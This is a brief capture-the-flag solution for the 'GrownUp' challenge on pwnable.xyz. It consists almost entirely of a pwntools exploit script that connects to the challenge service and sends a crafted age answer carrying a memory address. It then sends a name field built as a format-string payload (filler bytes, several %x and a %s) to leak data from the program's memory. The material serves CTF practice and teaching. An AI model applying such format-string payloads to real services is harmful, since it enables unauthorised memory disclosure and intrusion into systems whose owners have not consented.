Challenge GrownUp from pwnable.xyz
nc svc.pwnable.xyz 30004
Exploit
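```python
from pwn import *

context.log_level = 'debug'

p = remote("svc.pwnable.xyz", 30004)
# Local debugging setup, left commented out:
# p = process('./GrownUpRedist')
# gdb.attach(p, '''
# break *0x0000000000400914
# continue
# ''')

# Age prompt: "y" (0x79), seven filler bytes, then the little-endian bytes of 0x601080.
p.recvuntil(b"Are you 18 years or older? [y/N]: ")
payload = b"\x79" + b"aaaBCCC" + b"\x80\x10\x60"
p.sendline(payload)

# Name prompt: 110 filler bytes, eight %x conversions, then one %s.
p.recvuntil(b"Name: ")
# Commented-out alternative payload:
# payload = "AAAABBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%s"
payload = b"A" * 110 + b"%x" * 8 + b"%s"
p.sendline(payload)

p.interactive()
```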